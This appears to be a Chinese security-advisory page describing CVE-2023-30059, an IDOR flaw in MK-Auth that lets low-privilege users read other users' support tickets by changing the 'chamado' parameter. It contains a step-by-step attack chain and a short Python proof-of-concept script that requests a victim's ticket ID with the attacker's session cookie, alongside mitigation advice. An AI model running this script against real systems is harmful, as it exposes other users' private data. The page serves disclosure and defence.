CVE-2023-30059 CVSS 5.4 中危

CVE-2023-30059 MK-Auth不安全的直接对象引用漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-30059

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MK-Auth

漏洞概述

MK-Auth 23.01K4.9 版本存在不安全的直接对象引用（IDOR）漏洞。由于系统未对资源访问进行严格的权限校验，经过认证的低权限攻击者可以通过构造特制的 GET 请求，篡改其中的 `chamado` 参数，从而访问、查看甚至发送属于其他用户的支持工单。这导致了敏感信息的泄露及数据的完整性受损。

技术细节

该漏洞的核心在于 MK-Auth 的支持请求处理模块未能正确实施基于角色的访问控制（RBAC）。当用户请求查看或发送支持工单时，后端接口直接信任并使用 GET 请求中的 `chamado` 参数作为数据库查询的唯一标识，而没有在服务器端验证当前发起请求的用户 ID 是否与该工单记录的所有者 ID 相匹配。

攻击者利用这一缺陷，首先登录系统获取合法的低权限 Session，随后通过抓包工具或直接修改浏览器 URL 中的 `chamado` 参数，将其值遍历或猜测为其他用户的工单 ID。由于服务器端缺乏对象所有权校验逻辑，攻击者能够成功检索到本应受保护的其他用户数据，实现了水平越权访问。此类 IDOR 漏洞通常属于业务逻辑层面的设计缺陷，修复需要重构权限校验中间件。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或通过其他方式获取 MK-Auth 系统的一个合法低权限用户账号，并成功登录以获取有效的 Session Cookie。

STEP 2

2. 分析参数

攻击者分析系统网络流量，发现处理支持请求的接口中包含名为 `chamado` 的参数，该参数直接对应数据库中的记录 ID。

STEP 3

3. 构造请求

攻击者修改 GET 请求，将 `chamado` 参数的值更改为目标用户的 ID（例如 1002），同时保持自己的 Session Cookie 不变。

STEP 4

4. 越权访问

服务器端接收请求后，仅根据 `chamado` 参数查询数据，未校验请求者身份，直接返回了目标用户的敏感支持工单信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_idor_vulnerability(target_url, session_cookie, target_chamado_id):
    """
    PoC for CVE-2023-30059: IDOR in MK-Auth
    """
    headers = {
        "Cookie": f"PHPSESSID={session_cookie}"
    }
    # The vulnerable endpoint usually looks like /path/to/support?chamado=ID
    params = {
        "chamado": target_chamado_id
    }

    try:
        response = requests.get(target_url, headers=headers, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Successfully accessed chamado ID {target_chamado_id}")
            print(f"[+] Response content snippet: {response.text[:200]}")
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

# Usage Example
# Replace these with actual values from the target environment
target = "http://target-ip/mk-auth/system/url"
session = "valid_attacker_session_id"
victim_id = "1002" # ID guessed or enumerated

check_idor_vulnerability(target, session, victim_id)

影响范围

MK-Auth 23.01K4.9

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员通过 WAF（Web应用防火墙）添加规则，拦截对 `chamado` 参数的异常遍历请求，或者在应用层代码中临时添加归属权校验逻辑，即查询数据的同时比对 `user_id`。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2023-30059
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2023-30059
3 Details https://www.cvedetails.com/cve/CVE-2023-30059/
4 VulDB https://vuldb.com/cve/CVE-2023-30059
5 Link https://github.com/yueslly/MKAUTH-IDOR

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表